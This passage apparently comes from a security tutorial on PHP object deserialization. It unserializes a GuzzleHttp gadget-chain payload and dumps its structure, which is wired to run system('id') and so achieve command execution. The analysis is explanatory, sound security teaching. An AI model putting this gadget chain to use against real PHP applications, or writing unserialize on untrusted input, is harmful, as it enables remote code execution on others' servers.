To understand the payload more clearly, we can deserialize it and useĀ var_dump on it. According to the PHP manual, var_dump displays structured information (including the type and value) about one or more expressions. Arrays and objects are explored recursively by var_dump, and values are indented to show structure. We could also use the print_r() function to perform the same operation:
Since we used the payload based on theĀ GuzzleHttp client, we need to have Guzzle installed. We can unserialize it using the following PHP code:
<?php
require __DIR__ . '/vendor/autoload.php';
$obj= unserialize(json_decode(file_get_contents("./payload.txt")));
var_dump($obj);
?>
Running the code will give us the following output:
object(GuzzleHttp\Psr7\FnStream)#3 (2) {["methods":"GuzzleHttp\Psr7\FnStream":private]=>array(1) {["close"]=>array(2) {[0]=>object(GuzzleHttp\HandlerStack)#2 (3) {["handler":"GuzzleHttp\HandlerStack" :private]=>string(1) "id"["stack":"GuzzleHttp\HandlerStack":private]=>array(1) {[0]=>array(1) {[0]=>string(4) "system"}}["cached":"GuzzleHttp\HandlerStack" :private]=>bool(false)}[1]=>string(7) "resolve"}}["_fn_close"]=>array(2) {[0]=>object(GuzzleHttp\HandlerStack)#2 (3) {["handler":"GuzzleHttp\HandlerStack" :private]=>string(1) "id"["stack":"GuzzleHttp\HandlerStack":private]=>array(1) {[0]=>array(1) {[0]=>string(4) "system"}}["cached":"GuzzleHttp\HandlerStack" :private]=>bool(false)}[1]=>string(7) "resolve"}
This, when executed, causes the system() function to be executed with the command passed as an argument to this function, and the output is returned to us.